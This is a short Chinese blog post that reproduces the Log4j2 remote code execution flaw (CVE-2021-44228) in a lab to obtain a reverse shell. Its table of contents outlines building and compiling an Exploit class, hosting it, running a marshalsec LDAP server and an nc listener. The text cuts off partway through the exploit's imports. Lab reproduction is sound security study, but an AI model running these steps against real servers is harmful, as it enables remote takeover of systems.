Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
文章目录
1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell
最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下
1、构造EXP
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.Runtime;
import java.lang.Process;
public class Exploit{
public Exploit() throws Excep
共有 0 条评论